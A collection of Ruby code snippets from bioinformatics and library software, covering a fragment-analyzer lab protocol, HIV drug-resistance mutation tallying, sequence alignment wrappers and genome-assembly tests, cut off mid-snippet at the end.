"def runAnalyzer(num_samples,inhash)\n # select profile for run\n show do \n title \"Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}\" # this is just a profile name, should be ok for other polymerases\n note \"Click <b>Back to Wizard</b> if previous data is displayed.\"\n check \"Under <b>Process -> Process Profile</b>, make sure <b>#{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]}</b> is selected.\"\n end\n \n # select alignment marker\n ref_marker = (inhash[:sampleTypes] == 'DNA') ? REF_MARKERS[inhash[:type_ind]][inhash[:cutoff_ind]] : REF_MARKERS[inhash[:type_ind] ]\n show do \n title \"Select alignment marker\"\n check \"Under <b>Marker</b>, in the <b>Reference Marker </b> drop-down, select <b>#{ref_marker}</b>. A green dot should appear to the right of the drop-down.\"\n end\n \n # empty rows\n if inhash[:sampleTypes] == 'RNA'\n num_samples = num_samples + 1 # Include the ladder in the first well of the first stripwell\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n (num_samples % WELLS_PER_STRIPWELL) > 0 ? nonempty_rows + 1 : nonempty_rows\n else\n nonempty_rows = (num_samples/WELLS_PER_STRIPWELL.to_f).ceil\n end\n show do \n title \"Deselect empty rows\"\n check \"Under <b>Sample selection</b>, deselect all rows but the first #{nonempty_rows}.\"\n end\n \n # check \n show do \n title \"Perform final check before running analysis\"\n note \"Under <b>Run Check</b>, manually confirm the following:\"\n check \"Selected rows contain samples.\"\n check \"Alignment marker is loaded (changed every few weeks).\"\n end\n \n # run and ask tech for remaining number of runs\n run_data = show do \n title \"Run analysis\"\n note \"If you can't click <b>Run</b>, and there is an error that reads <b>The pressure is too low. Replace the nitrogen cylinder or check the external nitrogen source</b>, close the software, and reopen it. Then restart at title - <b>Select #{QIAXCEL_TEMPLATE[inhash[:sampleTypes]]} </b>\"\n check \"Otherwise, click <b>Run</b>\"\n note \"Estimated time of experiment is given at the bottom of the screen\"\n get \"number\", var: \"runs_left\", label: \"Enter the number of <b>Remaining Runs</b> left in this cartridge\", default: 0\n #image \"frag_an_run\"\n end\n \n # return\n run_data[:runs_left]\n \n end",
"def before_perform\n init\n\n @inputformat = params['informat'] ? params['informat'] : \"\"\n\n @colors = ['red', 'orange', 'yellow', 'darkgreen', 'green', 'lightblue', 'blue', 'violet', 'pink']\n #@colors = ['red', 'blue', 'yellow', 'darkgreen', 'pink', 'lightblue', 'orange', 'green', 'pink']\n\n @inputSequences = Array.new\n @inputTags = Array.new\n #@db_path = File.join(GCVIEW, 'tool.db')\n\n @db_path = File.join(DATABASES, 'gcview', 'tool.db')\n @show_number = params['show_number'] ? params['show_number'] : \"5\"\n @show_type = params['show_type'] ? params['show_type'] : \"genes\"\n @cut_off = params['evalue_cutoff'] ? params['evalue_cutoff'] : \"1e-3\"\n\n @input = @basename+\".in\"\n params_to_file(@input, 'sequence_input', 'sequence_file')\n @input_job = @basename+\".jin\"\n params_to_file(@input_job, 'jobid_input')\n #logger.debug \"Params seq inp: #{params.inspect}\"\n\n @input_jobid = false\n @input_sequence = false\n \n @outfile = @basename\n\n @configfile = @basename+\".conf\"\n\n @mainlog = job.statuslog_path\n\n @tmparray = Array.new\n @jobtype = Array.new\n @formerjob = ''\n \n if (params['sequence_input']!=nil || params['sequence_file']!=nil)\n if (@inputformat=='fas')\n check_fasta\n end\n\n if (@inputformat=='gi')\n check_GI\n end\n @input_sequence=true\n end\n\n if (params['jobid_input']!=nil)\n parse_sequencefile(@input_job)\n\n for i in 0..@inputSequences.length-1\n @inputSequences[i]=@inputSequences[i].gsub(/\\s+$/, '')\n end\n @input_jobid=true\n end\n\n if (@cut_off =~ /^e.*$/)\n @cut_off = \"1\" + @cut_off\n end\n\n\n\n # Angabe, wie viele Inputsequences bzw. JobIDs gegeben sind\n @inputSequences_length = @inputSequences.length\n logger.debug \"InputSequences Length: #{@inputSequences_length}\"\n\n logger.debug \"Input_Sequences (before_perform): #{@inputSequences.length} \"\n logger.debug \"tmparray (before_perform): #{@tmparray.length}\"\n logger.debug \"jobtype (before_perform): #{@jobtype.length}\"\n\n if (@inputSequences_length == 0)\n logfile = File.open(job.statuslog_path, \"w\")\n logfile.write(\"No valid input found -- Exiting...\")\n logfile.close \n self.status = STATUS_ERROR\n self.save!\n job.update_status\n raise \"No valid input found\" # just to be sure\n else\n write_configfile\n end\n\n #Check input format\n\n ### -> muss noch erledigt werden: jetzt allerdings Annahme, dass nur IDs eingegeben werden\n\n #if JobID: JobIDS getrennt ins Array @inputIDs speichern; Array-Laenge bestimmen\n\n #if (@inputformat=='jid')\n # 1) Testen, ob Jobs existieren und ob es sich um einen PsiblastJob handelt, dann in Array\n # einfuegen\n #-> erledigt: parse_sequencefile\n\n # 2) Arraylaenge bestimmen\n # @inputSequences_length = @inputSequences.length -> erledigt: in before_perform\n #if FASTA: bei Input einer Fasta-Sequenz gibt es nur ein Inputfile -> Array hat nur die Länge 1\n #else\n #Wird noch hinzugefuegt, allerdings erst nachdem der jid-Teil fertig ist ... .\n #end\n\n\n\n # Inputfiles aus den Psiblast-Tmp-Verzeichnissen holen + ins neue tmp-Verzeichnis speichern\n # -> für Anzahl der Psiblast-Jobs, die verwendet werden ... 
.\n #for (i=0; i<@inputSequences_length; i++)\n\n\n\n # 1) Input Format checken:\n # a) JobIDs: - IDs trennen\n # - Anzahl (nicht mehr als 10)\n # - IDs in ein Array schreiben und schauen, ob es diese ID überhaupt noch gibt\n # (Mysql Table zu JobID die MysqlID suchen, dann mit MysqlID im tmp-Verz.\n # schauen -> aehnlich Jobscard am li Rand)\n # -> Anzahl der Inputfiles richtet sich nach der Anzahl der JobIDs\n # b) FASTA: - Psiblast laufen lassen (ein Inputfile ...)\n # c) in Array abspeichern\n # 2) Arraylaenge der Inputfiles abspeichern\n end",
"def test_project_from_assembly_to_contigs_with_strand_and_ending_in_gaps\n # This chromosomal region is covered by 2 contigs and 2 gaps at the end: GaCoGaCoGa\n assert_equal(5, @target_slices_contigs_with_strand_ends_in_gaps.length)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[0].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand_ends_in_gaps[1].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[2].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:5704:1', @target_slices_contigs_with_strand_ends_in_gaps[3].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand_ends_in_gaps[4].class)\n end",
"def sdrm_in_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"IN\"\n rf_label = 2\n start_codon_number = 53\n n_seq = sequences.size\n mut = {}\n mut_com = []\n aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n aa[name] = aa_seq.join(\"\")\n record = sdrm_int(aa_seq, start_codon_number)\n mut_com << record\n record.each do |position,mutation|\n if mut[position]\n mut[position][1] << mutation[1]\n else\n mut[position] = [mutation[0],[]]\n mut[position][1] << mutation[1]\n end\n end\n end\n mut.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [region, n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n aa_start = start_codon_number\n\n aa_size = aa.values[0].size - 1\n\n (0..aa_size).to_a.each do |p|\n aas = []\n aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def getFt \n kword = ARGV[1]\n seq = @gb.to_biosequence\n seqoptions = \"\"\n\n for c in 2..ARGV.length-1\n seqoptions += \"#{ARGV[c]},\"\n end\n \n # look through all features\n @gb.each_cds do |ft|\n ftH = ft.to_hash\n loc = ft.locations\n gene = []\n product = []\n if (!ftH[\"gene\"].nil? && ftH[\"gene\"][0].downcase.include?(kword.downcase)) or\n (!ftH[\"product\"].nil? && ftH[\"product\"][0].downcase.include?(kword.downcase)) \n sbeg = loc[0].from.to_i\n send = loc[0].to.to_i\n fasta = Bio::Sequence::NA.new(seq.subseq(sbeg,send))\n position = \"#{sbeg}..#{send}\"\n if loc[0].strand == -1\n fasta.reverse_complement!\n position = \"c#{position}\"\n end\n pep = Bio::Sequence.new(fasta.translate)\n gene = ftH[\"gene\"][0] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"][0] if !ftH[\"product\"].nil?\n if seqoptions.downcase.include?(\"pep\") or seqoptions.downcase.include?(\"prot\")\n puts pep.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\", 60)\n else\n dna = Bio::Sequence.auto(fasta)\n puts dna.output_fasta(\"#{@accession}|#{position}|#{ftH[\"protein_id\"][0]}|#{gene}|#{product}|#{@org}\",60)\n end\n end\n end\nend",
"def sdrm_rt_bulk(sequences, cutoff = 0, temp_r_dir = File.dirname($0))\n region = \"RT\"\n rf_label = 1\n start_codon_number = 34\n gap = \"AGACTTCAGGAAGTATACTGCATTTACCATACCTAGTATAAACAATGAGACACCAGGGATTAGATATCAGTACAATGTGCTTCCAC\"\n\n n_seq = sequences.size\n mut_nrti = {}\n mut_nnrti = {}\n mut_com = []\n r1_aa = {}\n r2_aa = {}\n point_mutation_list = []\n sequences.each do |name,seq|\n r1 = seq[0,267]\n r2 = seq[267..-1]\n seq = r1 + gap + r2\n s = Sequence.new(name,seq)\n s.get_aa_array(rf_label)\n aa_seq = s.aa_array\n\n r1_aa[name] = aa_seq[0,89].join(\"\")\n r2_aa[name] = aa_seq[-85..-1].join(\"\")\n nrti = sdrm_nrti(aa_seq,start_codon_number)\n nnrti = sdrm_nnrti(aa_seq,start_codon_number)\n mut_com << (nrti.merge(nnrti))\n\n nrti.each do |position,mutation|\n if mut_nrti[position]\n mut_nrti[position][1] << mutation[1]\n else\n mut_nrti[position] = [mutation[0],[]]\n mut_nrti[position][1] << mutation[1]\n end\n end\n nnrti.each do |position,mutation|\n if mut_nnrti[position]\n mut_nnrti[position][1] << mutation[1]\n else\n mut_nnrti[position] = [mutation[0],[]]\n mut_nnrti[position][1] << mutation[1]\n end\n end\n end\n\n mut_nrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n\n mut_nnrti.each do |position,mutation|\n wt = mutation[0]\n mut_list = mutation[1]\n count_mut_list = count(mut_list)\n count_mut_list.each do |m,number|\n ci = r_binom_CI(number, n_seq, temp_r_dir)\n label = number < cutoff ? \"*\" : \"\"\n point_mutation_list << [\"NNRTI\", n_seq, position, wt, m, number, (number/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n end\n point_mutation_list.sort_by! {|record| record[2]}\n\n link = count(mut_com)\n link2 = {}\n link.each do |k,v|\n pattern = []\n if k.size == 0\n pattern = ['WT']\n else\n k.each do |p,m|\n pattern << (m[0] + p.to_s + m[1])\n end\n end\n link2[pattern.join(\"+\")] = v\n end\n linkage_list = []\n link2.sort_by{|_key,value|value}.reverse.to_h.each do |k,v|\n ci = r_binom_CI(v, n_seq, temp_r_dir)\n label = v < cutoff ? \"*\" : \"\"\n linkage_list << [region, n_seq, k, v, (v/n_seq.to_f).round(5), ci[0], ci[1], label]\n end\n\n report_list = []\n\n div_aa = {}\n r1_aa_start = 34\n r2_aa_start = 152\n\n r1_aa_size = r1_aa.values[0].size - 1\n r2_aa_size = r2_aa.values[0].size - 1\n\n (0..r1_aa_size).to_a.each do |p|\n aas = []\n r1_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r1_aa_start] = count_aas.sort_by{|_k,v|v}.reverse.to_h\n r1_aa_start += 1\n end\n\n (0..r2_aa_size).to_a.each do |p|\n aas = []\n r2_aa.values.each do |r1|\n aas << r1[p]\n end\n count_aas = count(aas)\n div_aa[r2_aa_start] = count_aas.sort_by{|k,v|v}.reverse.to_h\n r2_aa_start += 1\n end\n\n div_aa.each do |k,v|\n record = [region, k, n_seq]\n $amino_acid_list.each do |amino_acid|\n aa_count = v[amino_acid]\n record << (aa_count.to_f/n_seq*100).round(4)\n end\n report_list << record\n end\n\n return [point_mutation_list, linkage_list, report_list]\nend",
"def process_records(source, format, marc, test) \n STDOUT.puts \"Processing...\"\n source = resolve_source(source) || source\n # Set encoding based on format or file extension.\n if format == \"oclc\"\n external_encoding = \"cp866\"\n else\n external_encoding = \"UTF-8\"\n end\n extension = \".#{format}\"\n marc_out = OUT + \"kumc_ebooks_\" + source + extension\n mode = test ? \"Test\" : \"Normal\"\n unless @quiet\n STDOUT.puts \"Processing #{format.upcase} from \" + source + \" with Mode: \" + mode\n end\n reader = MARC::Reader.new(marc, :external_encoding => external_encoding, :internal_encoding => \"UTF-8\", :invalid => :replace, :replace => \"\")\n writer = MARC::Writer.new(marc_out)\n logfile = File.open(LOGFILE, 'ab')\n counter = 0\n for record in reader\n # Do record enhancements\n newrecord = add_control_number(record)\n newrecord = add_holding_location(newrecord)\n if source == \"Clinical_Key\"\n newrecord = fix_clinicalkey_links(newrecord)\n end\n newrecord = add_link_prefix(newrecord)\n newrecord = set_link_text(newrecord)\n\n\n # Re-sort the tags in the record after appending fields.\n newrecord.fields.sort_by!{|f| f.tag}\n \n begin\n writer.write(newrecord)\n rescue MARC::Exception => e\n STDERR.puts e.message\n STDERR.puts e.backtrace.inspect\n end \n \n # Log 001 source control number\n logfile.puts record['001'].value\n counter += 1\n unless @quiet\n STDOUT.puts counter if (counter.modulo(100)).zero?\n end\n end\n writer.close\n logfile.close\n unless @quiet\n\t\tSTDOUT.puts counter.to_s + \" MARC records written to\"\n\t\tSTDOUT.puts marc_out\n\t\tSTDOUT.puts \"Source Control Numbers (001) logged to #{LOGFILE}\"\n end\nend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def find_probes(indexed_bam_file, contig_names_positions_directions, kmer, path_to_cny_unified_seq_names_file)\n # need to check the sequence of the aligned read is the same as what is in the cny_unified_seq_names_file\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def buildSampeCommand(read1File, read2File, read1Seq, read2Seq)\n puts \"BWA command\"\n puts @bwaPath\n puts @reference\n puts read1File + \" \" + read2File\n puts read1Seq + \" \" + read2Seq\n puts @samFileName\n cmd = \"time \" + @bwaPath + \" sampe -P \" + \n \" -r \" + buildRGString() + \" \" + @reference + \" \" +\n read1File + \" \" + read2File + \" \" + read1Seq + \" \" + read2Seq +\n \" > \" + @samFileName.to_s\n puts cmd\n return cmd\n end",
"def sequence_check_for_submission(sequence,group_hash,reversed_group_hash)\n\n result_array = Array.new\n aa_threshold = 0.9\n \n begin\n \n query = Bio::FastaFormat.new( sequence )\n query_name = query.definition\n sequence = query.to_seq\n\n existing_matched_group_exist = CustomizedProteinSequence.find_by(:chain => sequence.seq)\n if !existing_matched_group_exist.nil? # find existing sequence\n result_array << collection(query_name, \"WARN\", \"Your sequence exists in our database. Common Name: #{existing_matched_group_exist.header} \")\n return result_array\n end\n\n sequence.auto # Guess the type of sequence. Changes the class of sequence.\n query_sequence_type = sequence.seq.class == Bio::Sequence::AA ? 'protein' : 'gene'\n\n program = 'blastp'\n database = 'reductive_dehalogenase_protein'\n blast_options = get_blast_options\n\n\n blaster = Bio::Blast.local( program, \"#{Rails.root}/index/blast/#{database}\", blast_options)\n aa_report = blaster.query(sequence.seq) # sequence.seq automatically remove the \\n; possibly other wildcard\n aa_similarity = aa_report.hits().length.to_f / aa_report.db_num().to_f\n identity_with_90 = check_alignment_identity(aa_report, 90) # identity_with_90 contains all the header that share >=90% identity\n\n # group_hash => group : Array {seq_definition}\n # reversed_group_hash = seq_definition : group\n if identity_with_90.length > 0\n identified_group_at_aa_level = get_identified_group(identity_with_90,group_hash,reversed_group_hash) # identified_group_at_aa_level contains confirmed group in aa level \n else\n # if identity_with_90.length == 0; no RD with ~=90% identity => create new RD groups\n\n if aa_similarity >= aa_threshold\n last_group = CustomizedProteinSequence.group(:group).order(:group).last.group\n new_group_number = last_group + 1\n result_array << collection(query_name,\"NEW\", \"Your sequence belongs to a new RD group: #{new_group_number}\",new_group_number)\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity of any sequences in database at amino acid level.\")\n end\n\n return result_array\n end\n\n if identified_group_at_aa_level.length > 0\n result_array << collection(query_name, \"SUCCESS\",\"Your sequence belongs RD group: #{identified_group_at_aa_level.join(\",\")}\",identified_group_at_aa_level.join(\",\"))\n else\n result_array << collection(query_name, \"FAILED\",\"Your sequence doesn't share 90\\% identity with all representatives of the group at amino acid level.\")\n end\n\n return result_array\n \n rescue => exception\n # puts exception\n result_array << collection(query_name, \"ERROR\",\"Your sequence is not validated. Or send it to our lab for manual checking.\")\n end\n \n return result_array\n\n end",
"def muscle_sequence2(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n aln_ref = fasta_to_hash(temp_aln)[\">ref\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return [aln_ref, aln_seq]\nend",
"def traceback(i, j, tn) \n alignment = [\"\", \"\"]\n \n loop do\n t = @ts[tn][1]\n \n # Are we at the end?\n return [alignment] if i == 0 || j == 0\n # If performing a local alignment, has the score dropped below 0?\n return [alignment] if !@align_globally && @ts[tn][0][i][j] <= 0\n \n # Insert as appropriate.\n if t[i][j][0][0] == i - 1\n alignment[0].insert(0, @a[i - 1])\n else\n alignment[0].insert(0, '_')\n end\n if t[i][j][0][1] == j - 1\n alignment[1].insert(0, @b[j - 1])\n else\n alignment[1].insert(0, '_')\n end\n \n # During local alignment, you must implement the following simplification. \n # If you trace back to a cell that contains pointers to a zero in the M \n # matrix and a pointer to a zero in the Ix or Iy matrix, you should only \n # follow the pointer to the zero in the M matrix and terminate your \n # traceback there only. This will prevent you from having alignments \n # that are right-sided substrings.\n \n # If there are multiple possible traceback paths originating in this cell,\n # recurse and follow them individually.\n if t[i][j].size > 1\n # If we are tracing back to a cell with a 0 in the M matrix, we ignore\n # other possible tracebacks.\n if t[i][j].any? {|c| c[2] == :m && @m[c[0]][c[1]] == 0}\n tracebacks = t[i][j].select {|c| c[2] == :m}\n else\n tracebacks = t[i][j]\n end\n \n subalignments = []\n tracebacks.each do |cell|\n traceback(cell[0], cell[1], cell[2]).each do |subalignment|\n subalignments << subalignment\n end\n end\n return subalignments.map do |subalignment|\n [\n subalignment[0] + alignment[0],\n subalignment[1] + alignment[1]\n ]\n end\n end\n \n i, j, tn = t[i][j][0]\n end\n end",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def run_score\n filename = self.generate_fasta_alignment_file\n string = \"./lib/score_mac #{filename} temp_data/#{self.alignment_name}_res.txt temp_data/#{self.alignment_name}_dif.txt temp_data/#{self.alignment_name}_alignments.txt\"\n puts string\n if system(string)\n \n end\n end",
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def muscle_sequence(ref_seq = \"\", test_seq = \"\", temp_dir=File.dirname($0))\n temp_file = temp_dir + \"/temp\"\n temp_aln = temp_dir + \"/temp_aln\"\n name = \">test\"\n temp_in = File.open(temp_file,\"w\")\n temp_in.puts \">ref\"\n temp_in.puts ref_seq\n temp_in.puts name\n temp_in.puts test_seq\n temp_in.close\n print `muscle -in #{temp_file} -out #{temp_aln} -quiet`\n aln_seq = fasta_to_hash(temp_aln)[\">test\"]\n File.unlink(temp_file)\n File.unlink(temp_aln)\n return aln_seq\nend",
"def parse_to_file()\n i = 0\n str_n = \"\"\n\n # generating string with 50 N's\n while i<50\n str_n = \"#{str_n}N\"\n i += 1\n end\n\n seq1 = \"\"\n seq2 = \"\"\n\n line1 = @f1.readline().chomp\n line2 = @f2.readline().chomp\n\n tmp1 = line1.split(\" \")\n tmp2 = line2.split(\" \")\n\n header = \"#{tmp1[0]}::#{tmp2[0]}\"\n\n while !@f2.eof?()\n\n line2 = @f2.readline().chomp\n line1 = @f1.readline().chomp\n\n unless line1.include?('>')\n seq1 = seq1 + \"#{line1}\"\n seq2 = seq2 + \"#{line2}\"\n\n else\n\n seq = seq1 + str_n + seq2\n seq1 = \"\"\n seq2 = \"\"\n str = \"#{header}\\n#{seq}\"\n @out.write(str+\"\\n\")\n\n tmp1 = line1.split(\" \")\n tmp2 = line2.split(\" \")\n\n header = \"#{tmp1[0]}::#{tmp2[0]}\"\n\n end\n end\n @out.write(header+\"\\n\"+seq1+str_n+seq2+\"\\n\")\n end",
"def test_project_from_assembly_to_contigs_with_strand\n # This chromosomal region is covered by 4 contigs and 3 gaps\n # One of the contigs are on the reverse strand.\n assert_equal(7, @target_slices_contigs_with_strand.length)\n assert_equal('contig:Btau_4.0:AAFC03028964:90:9214:1', @target_slices_contigs_with_strand[0].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028959:1:1746:-1', @target_slices_contigs_with_strand[2].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[3].class)\n assert_equal('contig:Btau_4.0:AAFC03028970:1:17365:1', @target_slices_contigs_with_strand[4].display_name)\n assert_equal(Gap, @target_slices_contigs_with_strand[5].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_contigs_with_strand[6].display_name)\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def run_seq(test=false)\n if @opts[:gtpath].nil?\\\n || !File.exist?(@opts[:gtpath])\\\n || !File.executable?(@opts[:gtpath]) then\n raise \"gt binary not found or executable: #{@opts[:gtpath]}\"\n end\n each_seq do |nr, chr, arglist, chr_cfg|\n if test then\n run \"#{@opts[:gtpath]} #{arglist.join(\" \")}\", :maxtime => 500\n else\n STDERR.puts \"Running #{@job}: seq '#{nr}'\"\n success = Kernel.system(\"#{@opts[:gtpath]} #{arglist.join(\" \")}\")\n end\n if success or test then\n yield nr, chr[:resultfile], chr[:innerfile], \\\n chr[:gff3file], chr[:fastafile]\n else\n raise \"canceled command: #{@opts[:gtpath]} #{arglist.join(\" \")}\"\n end\n end\n end",
"def merge_pairwise(aligns)\n ps = aligns.map do |align| \n seqs = []\n align.each do |bioseq|\n seqs << bioseq.to_s\n end\n seqs\n end\n template = []\n #m,x,n\n x = 2\n ftemp = ps.first.first\n nmax = ps.map {|pair| pair.first.size }.max\n mmax = ps.size\n mar = (0...mmax).to_a\n others = mar.map { [] }\n ns = mar.map { 0 }\n tn = 0\n on = 0\n (0...nmax).each do |n|\n (t_dsh, t_no_dsh) = mar.partition do |m| \n # this is RUBY 1.8 ONLY!!\n ps[m][0][ns[m]] == 45 # '-' is ascii 45\n end\n\n # if a template has a dash, all other off-templates need a dash\n if t_dsh.size > 0\n template[tn] = 45\n t_no_dsh.each do |m|\n # don't update these guys counter\n others[m][tn] = 45\n end\n t_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n ns[m] += 1\n end\n else # no dashes in the template\n t_no_dsh.each do |m|\n others[m][tn] = ps[m][1][ns[m]]\n end\n template[tn] = ps[0][0][ns[0]]\n ns.map!{|v| v+1 } \n end\n tn += 1\n end\n [cs_to_s(template), others.map! {|ar| cs_to_s(ar) } ]\n end",
"def genomic_sequence\n genome_id = params[:genome][:id]\n reference_id = params[:reference]\n strand = params[:strand].presence || '+'\n\n ref = Reference.find(:first, :conditions => {:name => reference_id, :genome_id => genome_id})\n\n if ref.present?\n seq = Bio::Sequence::NA.new(\"#{ref.sequence.sequence.to_s}\")\n start = params[:start].presence || 1\n stop = params[:end].presence || seq.length\n @subseq = seq.subseq(start.to_i, stop.to_i)\n @subseq = @subseq.reverse_complement if strand == '-'\n end\n\n id = \"#{ref.name} #{start}..#{stop} #{strand}\"\n render :text => @subseq.to_fasta(id, 60), :content_type => 'text/plain'\n end",
"def align_local(protein)\n # Vytvoreni tabulky\n x = protein.sequence.size\n y = @genome.sequence.size\n tab = Array.new(x+1) { Array.new(y+1) }\n\n # Vyplnime prvni radek a sloupec\n for i in 0..x\n tab[i][0] = 0\n end\n for j in 0..y\n tab[0][j] = 0\n end\n\n for i in 1..x\n for j in 1..y\n match = tab[i-1][j-1] + match(i, j, protein)\n delete = tab[i-1][j] + @@d\n insert = tab[i][j-1] + @@d\n\n tab[i][j] = [match, delete, insert, 0].max\n end\n end\n\n @table = tab\n value = 0\n @lok_max_coordinates = [0,0]\n for i in 1..x\n for j in 1..y\n if tab[i][j] >= value\n value = tab[i][j]\n @lok_max_coordinates = [i, j]\n end\n end\n end\n EvaluatedProtein.new(protein, value)\n end",
"def identify_clusters\n raise ArgumentError, 'Missing BLAT alignment file.' unless @alignment_file\n \n # Pull out all of the hits clustered by the query into an array\n puts \"Reading alignment file...\" if @verbose\n query_hits = []\n IO::BLASTFormat.open(@alignment_file) do |f|\n f.each_query do |query, hits| \n query_hits << hits.select { |hit| hit.e_value <= @e_value }\n end\n end\n \n # Create a status bar to monitor thread process\n pbar = ProgressBar.new(\"Converting Hits\", query_hits.size, STDOUT) if @verbose\n \n # Thread the creation of the entries from the hits\n entries = Utilities::Threader.thread(query_hits, threads: @threads) do |thread_query_hits|\n thread_query_hits.map do |hits|\n pbar.inc if @verbose\n \n # Cluster the hits\n clusters = Alignment::Aligner.cluster_hits(hits, cluster_on: :subject)\n \n # Convert the clusters to entries\n clusters.map { |clustered_hits| create_feature(clustered_hits) }\n end\n end.flatten\n\n # Write the file\n puts \"Writing entries to file...\" if @verbose\n @output_file ||= \"#{@alignment_file}.gff3\"\n IO::GFFFormat.open(@output_file, mode: 